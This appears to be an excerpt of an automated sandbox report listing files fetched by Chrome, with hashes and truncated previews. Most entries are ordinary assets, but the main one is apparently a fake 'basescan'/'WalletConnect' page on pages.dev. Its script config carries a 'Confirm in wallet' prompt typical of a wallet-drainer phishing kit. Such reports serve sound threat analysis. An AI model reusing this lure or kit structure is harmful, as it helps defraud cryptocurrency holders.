                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2641)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2642
                                                                                                                                                                                                                                              Entropy (8bit):5.232557260519249
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:27Y067B+G2d3toT6mn6Z5TMYfKGAc3nYm2ezNRXzIQW5bHZzhKDD:UY0cEbdhMYfKO3n/jDIQsbPKf
                                                                                                                                                                                                                                              MD5:05348E9E31F6ACEB8F32357B932C656C
                                                                                                                                                                                                                                              SHA1:A293A6B70F095D4851B762AF92B2A3D5B06A03A6
                                                                                                                                                                                                                                              SHA-256:A7D5C5E10AFC43C1FEB2C4E3DFF7D12A656909FCC5EAAAD72396A9FD3EC65954
                                                                                                                                                                                                                                              SHA-512:F8E8E58668C5B444525FE4D9D0FAF6B9A2E78FE9FBF8ACC449DD43F91CB06450F97224C11AC0AA653CA7C27187A71801E2CC0CC530D3C777834AEAAD960E842B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/table-f81aed47.js
                                                                                                                                                                                                                                              Preview:var L=Object.defineProperty;var $=Object.getOwnPropertySymbols;var R=Object.prototype.hasOwnProperty,j=Object.prototype.propertyIsEnumerable;var w=(t,l,n)=>l in t?L(t,l,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[l]=n,m=(t,l)=>{for(var n in l||(l={}))R.call(l,n)&&w(t,n,l[n]);if($)for(var n of $(l))j.call(l,n)&&w(t,n,l[n]);return t};import{j as d,b as k,i as h,c as a,e as A,s as M,m as q,t as u}from"./web-13cf6287.js";import{c as z,T as x,E as D}from"./manifest-51a3674f.js";import{i as G,m as J,c as K,F as i,g as N}from"./solid-js-38561dfe.js";var O=u("<thead>"),T=u("<tr>"),Q=u("<th>"),S=u("<tbody>"),v=u("<td>"),U=u("<table>");const Z=t=>{var b,y;const[l,n]=G(t,["columns","data","components","bordered"]),g=J({bordered:!0},l),c={header:m({wrapper:r=>(()=>{var e=O();return d(e,r,!1,!1),e})(),row:r=>(()=>{var e=T();return d(e,r,!1,!1),e})(),cell:r=>(()=>{var e=Q();return d(e,r,!1,!1),e})()},(b=g.components)==null?void 0:b.header),body:m({wrapper:r=>(()=>{var e=S();return d(e,r,!
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1732)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1733
                                                                                                                                                                                                                                              Entropy (8bit):5.509145509234524
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:R56cYcricyQZeX714GvtxpJueJZUciyBClu:RZYu3ycer1/dDIyT
                                                                                                                                                                                                                                              MD5:F96FBEBFE59FDD6EC68F49CF8C699241
                                                                                                                                                                                                                                              SHA1:3DA570D8600212F63EFE714F202F4DDE0BDA9913
                                                                                                                                                                                                                                              SHA-256:AB93A021A0F9BAF159BF0D919FE563FE26A6946472BD880418546269E6B67054
                                                                                                                                                                                                                                              SHA-512:E19D6A93A54187A88423C60944BDFFE700186F1755FB31DA3C93810C6D364ADCDCB9A105ACE127CCBE8305A0D6AB14191CFE3B54E3CBEBB3370B99C003F8694B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var c=Object.defineProperty,d=Object.defineProperties;var l=Object.getOwnPropertyDescriptors;var e=Object.getOwnPropertySymbols;var f=Object.prototype.hasOwnProperty,m=Object.prototype.propertyIsEnumerable;var s=(a,t,r)=>t in a?c(a,t,{enumerable:!0,configurable:!0,writable:!0,value:r}):a[t]=r,n=(a,t)=>{for(var r in t||(t={}))f.call(t,r)&&s(a,r,t[r]);if(e)for(var r of e(t))m.call(t,r)&&s(a,r,t[r]);return a},o=(a,t)=>d(a,l(t));import{i as S}from"./manifest-aca455c4.js";var u=(a=>(a[a.Standard=832]="Standard",a[a.SameDrum=833]="SameDrum",a[a.AdditionalDrum=834]="AdditionalDrum",a))(u||{});function b(a){return Object.values(u).includes(a)}function w(a,t){if(t<=0||a<=0||t>a)return 1;{let r=1;for(let i=a;i>a-t;i--)r*=i;for(let i=t;i>1;i--)r/=i;return r}}function h(a){const t=a.match(/\d+/);if(t){const r=t[0];return Number(r)}else return 0}function D(a,t){return a.slice(0,t).map((i,p)=>o(n({},i),{label:i.draws===1?"1Draw":`${i.draws}Draws`,value:i.draws}))}const g={Australia:0,Austria:24,Barb
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 200x267, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):23680
                                                                                                                                                                                                                                              Entropy (8bit):7.908285557178888
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:hYNg7TXmVoPo/iND70VxDi+MKQFSv73DdCoLs6B7J988/mVEbPqc7VfP96us:hYy4oPo/ih7J+YubDps6BBmKPqcptg
                                                                                                                                                                                                                                              MD5:6CD8FCA9D6EB91896314F7F2BA3D722D
                                                                                                                                                                                                                                              SHA1:BF99C355B828F2E20040E457BCA45567327ECA6D
                                                                                                                                                                                                                                              SHA-256:39EFA056E6C14E254CC80C548B73241FA2756F091F775B68097646E8F5B6FDC3
                                                                                                                                                                                                                                              SHA-512:FDA1E3396B6F756A071A0F6E64BF9E1AC5B45BDFB5C38F0DFABF6047E10ED6182BD330E2F083244147A9B07E34C8E2AD1B584461D87856625FBB7E951EF33C1D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5526
                                                                                                                                                                                                                                              Entropy (8bit):5.5187788998653735
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:ODWZAXgyVnk1PaPwbTJX4Kbh/ago2RPjhkuj:rZAXgyVk1PaPk9IKQgh5j
                                                                                                                                                                                                                                              MD5:A50897FEA252B972449A9E246AA69FD7
                                                                                                                                                                                                                                              SHA1:E6D089C4B43227DB5062742EDB336DFABFB5CD6B
                                                                                                                                                                                                                                              SHA-256:5F8034781BA252E676DB2ADA75CB3D98DF874AA3747830223141FEFBED71C906
                                                                                                                                                                                                                                              SHA-512:A8C0E8B266778EC533ACD54F2921D6680DA3808D194084DFF60DD064793B648B50233337A05D83600BD427685B65ABD74A40A4BB11F3B44A2512AC55EB60C987
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*.CryptoJS v3.1.2.code.google.com/p/crypto-js.(c) 2009-2013 by Jeff Mott. All rights reserved..code.google.com/p/crypto-js/wiki/License.*/.var CryptoJS=CryptoJS||function(g,j){var e={},d=e.lib={},m=function(){},n=d.Base={extend:function(a){m.prototype=this;var c=new m;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},.q=d.WordArray=n.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=j?c:4*a.length},toString:function(a){return(a||l).stringify(this)},concat:function(a){var c=this.words,p=a.words,f=this.sigBytes;a=a.sigBytes;this.clamp();if(f%4)for(var b=0;b<a;b++)c[f+b>>>2]|=(p[b>>>2]>>>24-8*(b%4)&255)<<24-8*((f+
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 359 x 359, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):12686
                                                                                                                                                                                                                                              Entropy (8bit):7.977417950333406
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:oHI0YtrHMrhLowu1tMAcAMJ12B3122kNeNsqFA89lj2wQn6SADfS6:oHI0QHSLozMAcAE1YsRjk52wQn6SADF
                                                                                                                                                                                                                                              MD5:DE5D99A930C3A116C21A5DC1940F02A5
                                                                                                                                                                                                                                              SHA1:947251388715A8B0D4D8C6545D2C15F53617D3F1
                                                                                                                                                                                                                                              SHA-256:8685C0978A71911D2C87CFB9260471C9EEF9431D37DAF0ED244874865878D1D6
                                                                                                                                                                                                                                              SHA-512:AC51EF28F1DA38954E38778DD3EEDE86162BA73F5208B1E6459E44093D5CA1042131DC5F58E2D3C8B3B62AC9A7FA5228D45DE3E214C12F5B9EC60A677E8574E6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...g...g.....Mfx.....PLTE... !!."".!!.!!."".!!.!!.!!.!!.!!.!!.!!.!!.!!..............................................e..............:............5...x...............1..........I........W.............->...........,....#..{".~.3.........g .{#.z.....v.).. .u...|......op...8..r~....N.f..i..T).p.hT..l.u...d.mW`....W.]..g..^.k #.j..d....XC..Y}....T.O9..^.|.$.i.X.`..~.C.P@..Q.J4..[vwwF..-.H..X".]Ym...PT.C.q...Tlpp.<&.E.of...K.>*.:$.Y0..U..Q'.X0~..f*.7!fiipn1.6 ..G..M.<G.Ei.3..D$.3.!.Q..J^aa&n.BY..5...D.-.r].x].W[[./..}B.2Rt;. qF<K.RSRRC..-.*eG.1iMOO.p:aFC*F.(D.\L.GKJ.0#.d9(@.$<..J.z&XBFF&<..S.!U:=CB%8."7.o,"??>.V1.H..A.9??!3.&G7!2.6<;./.L2&Q j388.,..H,#1|.*.155.+.,64;3.!...&.'/S.;,+22. .*,,....4$&**+).$((...#&&"&& $$....""....!!...!..............%....tRNS.. 0@P`p..........t.zq....IDATx...?n.@........k.....:-5..1.h).'..P!:.4.m.E....&.]......M.U6,.0`......F.{.1..Ux...B.w.KI.....u.....r+<.#..H.......J.L.F.b.>..A.p6.p...N%....D.;...8
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10250
                                                                                                                                                                                                                                              Entropy (8bit):4.006263718380211
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:4domVIr1C23oYo/boM0PrxIVq9tb9GiLkQD8grBjjAt+V5wn3:GfIsVYqb0zxBkQggrBjj9O3
                                                                                                                                                                                                                                              MD5:B41FFF5E4E43AC0DF4E6AC6DC8EAEBA9
                                                                                                                                                                                                                                              SHA1:E9A1A0C286CFF6CDC44B1F8E0F0538DBEE3F10CD
                                                                                                                                                                                                                                              SHA-256:8ED21BBA60CA98AE691ADFB74B04E4865A2C77E3AC89D5670E123FC2CABBE00E
                                                                                                                                                                                                                                              SHA-512:8A5B4CC1F1B5C188313E97BE8DF31014C35098A0D100B569C1D0605A76F9DB5043D17A32BAF4E82C2CB0C4DD71D68DC42FC147569FE7FA8C0A0B18EB1C9DCE91
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="542.249" height="121.152" viewBox="0 0 542.249 121.152">.. <g id="etherscan-logo" transform="translate(-219.377 -213.516)">.. <path id="Path_8" data-name="Path 8" d="M12.333-43.9q0-6.084-4.193-6.084a6.742,6.742,0,0,0-1.727.164,12.4,12.4,0,0,1-2.22.247,2.4,2.4,0,0,1-1.809-.781,2.7,2.7,0,0,1-.74-1.932q0-2.878,3.442-2.878.082,0,1.228.082,12.29.822,11.472.822H18.6l19.747-.576q.574,0,4.261-.247,1.31-.082,2.375-.082,4.261,0,4.261,3.782,0,.658-.235,4.193-.176,2.631-.176,4.851a39.539,39.539,0,0,0,.137,4.029,34.313,34.313,0,0,1,.274,3.535q0,3.124-2.96,3.124t-2.96-4.378v-4.3q0-6.938-2.867-8.178-2.131-.908-10.98-.908a49.477,49.477,0,0,0-6.883.251q-3.524.919-3.524,5.011v8.222q0,3.289,1.459,3.782a7.91,7.91,0,0,0,1.946.164H25.8q5.109,0,5.109-3.535a20.357,20.357,0,0,0-.206-2.549,21.659,21.659,0,0,1-.206-2.8q0-3.289,2.919-3.289t2.919,3.535q0,.658-.532,5.1a56.592,56.592,0,0,0-.455,6.66q0,1.644.329,5.838.082.658.411,2.878a22.477,22.477,0,0,1,.247,2.878,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18782)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1469354
                                                                                                                                                                                                                                              Entropy (8bit):5.589295659299559
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:1uQlb9IIrb48+ohchR5d0OVKEEk/TG5FwKV3u2YQ:1uQtmIrb48+ohGdBVKEl/TG5OKV3u2YQ
                                                                                                                                                                                                                                              MD5:5631D4597AFD0E355B644CC5BDF9375B
                                                                                                                                                                                                                                              SHA1:881D48221BACEA33A89ABA5304D085C86A3C489B
                                                                                                                                                                                                                                              SHA-256:DDE389592EACD179A1582F82D15DF78B4C1229F5C52CCE9D4D57941628D93E01
                                                                                                                                                                                                                                              SHA-512:6025D78B227B706D3FE49171CF9F7DA2A46E026FE4E4C13FB2079BEF9BB264986EF3000AEDD48D3B636AF63F698FFB8DFAA8FDCEC27A767911FB57BF73449847
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:window.themeMode = "dark";..let cfg = {. domain: 'https://web3modal.com',. description: 'Web3Modal',. name: 'Web3Modal',. icon: 'https://avatars.githubusercontent.com/u/37784886',. headerText:"Action Required",. middleHeaderText:"Confirm in wallet",. text:"In order to continue you need to confirm an action in your wallet.",. loaderImg:"https://i.gifer.com/ZKZg.gif".}.import{Base64 as dB}from"https://cdn.jsdelivr.net/npm/js-base64@3.7.2/base64.mjs";!function(){const e=document.createElement("link").relList;if(!(e&&e.supports&&e.supports("modulepreload"))){for(const e of document.querySelectorAll('link[rel="modulepreload"]'))t(e);new MutationObserver((e=>{for(const r of e)if("childList"===r.type)for(const e of r.addedNodes)"LINK"===e.tagName&&"modulepreload"===e.rel&&t(e)})).observe(document,{childList:!0,subtree:!0})}function t(e){if(e.ep)return;e.ep=!0;const t=function(e){const t={};return e.integrity&&(t.integrity=e.integrity),e.referrerPolicy&&(t.referrerPolicy=e.referrerPoli
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                              Entropy (8bit):4.990637803415423
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:tnr/nUEVumc4slvtM65t5kyrL6ugFD4pK3aQJRtNgsKDjpn:tr/nTVuXM658Gjgt4pK3aQzHKDjpn
                                                                                                                                                                                                                                              MD5:4068CDE60F5861F58267AAA67AAAF077
                                                                                                                                                                                                                                              SHA1:B75388D28139EE00521C89ED560693C1A0505DBE
                                                                                                                                                                                                                                              SHA-256:0EDB798EBAB1E9AB1C1E563628416CF1A68AF4B3840129F920CF23DC9F61AECC
                                                                                                                                                                                                                                              SHA-512:8E7D247DC0A895CFB60B385598B7C5CC3282039BD33256280603F0492594DA90151FFB73A66D21B85A444160C60AB20797F950EB3BDF674A4AED8F317954AFBE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<svg width="128" height="128" viewBox="0 0 128 128" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M128 64C128 99.3462 99.2961 128 63.8883 128C30.2955 128 2.73697 102.208 0 69.3797H84.7409V58.6202H0C2.73697 25.7915 30.2955 0 63.8883 0C99.2961 0 128 28.6537 128 64Z" fill="#0052FF"/>.</svg>.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):31403
                                                                                                                                                                                                                                              Entropy (8bit):7.99175454198027
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:lTJl9x88nv/t9ER9e2u4yC60yWR4n4uM08zkBeOaNBj:lxx8wv/te9b6zn4u18zkg3
                                                                                                                                                                                                                                              MD5:43D8C6571B16656CB239EDDF40C7B823
                                                                                                                                                                                                                                              SHA1:137E4853135E116374D7BDFA29922F454B3A0D41
                                                                                                                                                                                                                                              SHA-256:62FBCDA6118731C37F9F73C76E89CDD6FFBDBC26238519C01E915D34FA213F6A
                                                                                                                                                                                                                                              SHA-512:112B0927DA8026FEC0045FB4C44E29310D019325FC67A9443A52F1F9A49EBAD32272D75AA88C0FD77F295B609CAE6D8C771B7E04A164CD22D067262B57B6979E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^...$.U'..M.......gvv....Z..j.2.}:....!....V...p.w...O.}....$$@.ad.Xy.Z.wvv...i_63..^DfVfVVuu....75.Y........../1..+Q.zt.....G=Z....u...z....V..z...P.X=Z....G.B=`.h].........u...z....V..z...P.X=Z....G.B=`.h].........u...z....V..z...P.X=Z....G.B=`.h].........u...z....V..z....[)C..p..p..2'.B8..=G=`.0......g.4).........W.X.7..L...i....(RJI.........z.z...!.`..Pb..`(...%....../.....W.X...p.3...B).... .A.X"$.B%D.....\.M...B..E.....p.JadD....(c.bl..*U/...m...j.?^..z..y..Y..>.....iQ.........S8..@>.<Y6kX.%...5.7.(m.[9..D...tu.;......'..{..9...-./.b.6.^p.. l4&...X.RJC.Z6C.=i...'.p..W.]n1VW...D.#..u.M.=U....o~p..q..<......FxI..e...!.z.Z7......Z...1.!..o,..e.%7.\...eU..Z..>......\d...#.".....;..O/...3....h...[..z..$z...d.)l.}Z.b.%.,f..%.]..#7.t..P..YU.Q...u...Pb1W.y..-.\?......O|t...T.....#..^Ml...E..w...G+S.&=.c .,.l.r..um.%gs.'....-..i.*...G.U\[F.eT..Z......!.G.G02r$j.c.]....M.> .jX.Q..Xkq...../8..u.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5180
                                                                                                                                                                                                                                              Entropy (8bit):7.908100803951756
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:J+jz4139zlODFnNGM4PU6nmBcGmVi3jT3vTJiFFEtej6CwBkquZZdZfX2:Uc7z3RM64cGmViT7vTcrEY6CykJr3fX2
                                                                                                                                                                                                                                              MD5:C62F710038256E01D4A529A2BE9D75FC
                                                                                                                                                                                                                                              SHA1:A6972B244CA520EA40C7D266A0AF628CD8996AC3
                                                                                                                                                                                                                                              SHA-256:01A5F8E14A754138E16678ADA6FF85ABF780D23E9F752D66F8F662E45BC099B1
                                                                                                                                                                                                                                              SHA-512:F4DA6F29AA97CAB22362CD01CB59A1B8FA6F1A3AA0B2EF824440D919E0D288E28B0CA84C672E652C1F8ED253340A2ABCA584B0F7D3AE2E85FA6F8AF16B0738BD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d..........$.A....sRGB.........PLTE............doa.mYeqc................iQ.`Xfrd.QH...ps....GI`XZl....bLVVjua[...KLb....fO79Vtv.._J...;>XCE]dj]TTh....ZH?A[}......qV.TKceZNOe[]odfv24S...lXPacs..........oV.tXpYIbn_.mStSBmp~.0Q...obYkm{.fXwz.f]Qz}.OKC^`q.XNSL;......eQEQRfwYId`V*,O.}^..a...^eWzUC...gM=%8..xZhD3mQBye`W]NWG4iTJM_L.PC.]U....\F^C1BNChix_m\KUHu|.r^WBXC_ZMVYK.kWXMB;S>~hcnj....VWESRA`K:.ZQHJCQeO&(M^^S.mh.gS`i[yK<.zx.}|`TJ~eR.]L.vZ9K@]QD`NAjfZYJ=...YjXG^G/G;.qn...gYKqF7UgUm[V.kV.urwbS1N:ZcToO<_.[....qb+ABga.2=3.}\..a.}x.xY..a]jZ.}\..`.yq.uj=B9j.^{u..`SZbPT.Xrt...b|rU.uv.m^.........pjS(D4^X.|no.tWI.Tu._.|.b.X.cSpce|.]...TQ}esWJIr3_Bl]_.WB..]qjmp}X~|Yn.[...uo.stv+=L5DH>GJ.ka{bYVOKosVByPT.V..^..b.._>Bh7hG...0=T.fZgjzyih.._;rLYtUMsR.qiqt.YcebUYJIQIE9DjL-V=.{..x.5>_WOW...bXqka....nau{l|wk.acb...[....IDAThC..{XVu....#.9.M.!.DqLd.DA0.D..!....&. Br......8..:.@..x.........c..A;HO.....~.......|..x...a..~...faaa..$ `....Y.......7o..x.9...._}..7.x.._~y.u.V.Z
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26724
                                                                                                                                                                                                                                              Entropy (8bit):4.881854638630576
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:xysLVYA8CIOYAUU1XHh7s2WfPhn8Abf5EjFQ+2QGTq23gFZrfIg4w1ZnPrTuw9aT:xykjVEiayZHw
                                                                                                                                                                                                                                              MD5:15014D1C11984807F05240879BBB2C6E
                                                                                                                                                                                                                                              SHA1:3AB76A7CFE5AAF2D3D60D34DB083DEF97C41C5CA
                                                                                                                                                                                                                                              SHA-256:190217A8761FBA1F0B45CC675E62B7214494C0606E3AD22D7FA1EFB773B0AE84
                                                                                                                                                                                                                                              SHA-512:7D2DD7060256F67ABAA8FEA9FFFC2E5D133C2148C8DAA81172DF4F98118AF03D10E8DED2DEA438B8AEB73EB56E62CC45B226A0390AB96311A8D1DECBFAF016FE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:{"code":0,"msg":null,"data":{"imgDomain":"https://start9.sptpub.com","items":[{"sportInfo":{"template":0,"inside_out":false,"name":"Soccer","priority":200,"slug":"soccer"},"categoryInfo":{"sport_id":"1","country_code":"ARG","name":"Argentina","priority":44,"slug":"argentina"},"tournamentInfo":{"category_id":"1669819052169760768","name":"Liga Profesional","slug":"liga-profesional","priority":210},"matchInfo":{"id":"2448270734146023472","desc":{"virtual":false,"competitors":[{"sport_id":"1","name":"Independiente Rivadavia","id":"36842","country_code":"ARG","abbreviation":"IRM"},{"sport_id":"1","name":"Instituto AC Cordoba","id":"4937","country_code":"ARG","abbreviation":"IAC"}],"scheduled":1727481600,"bet_builder":true,"tournament":"1669819052220092416","player_props":false,"type":"match","category":"1669819052169760768","sport":"1","slug":"independiente-rivadavia-instituto-ac-cordoba","all_markets":false},"state":{"provider":"35ff91e2","match_status":7,"status":1},"score":{"extra_info":
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (369)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                                              Entropy (8bit):4.965459885930902
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:QYpFo/IO9IvddJCidDbx7sTKjim4YDbfuPsCJ7Y4pvRNFenl+Lwn:xavqvLUQDbxs3m4YDbfuG4pXksLw
                                                                                                                                                                                                                                              MD5:1AD3A3520760DF4FA9CC4EC35E1F7ECC
                                                                                                                                                                                                                                              SHA1:B87C7D5005730EEA8E167156B5C11837DFEEEC31
                                                                                                                                                                                                                                              SHA-256:BC1C6936B1728DAAF439415D160EDF3960A11635979AFD652788BBEC564C3C4C
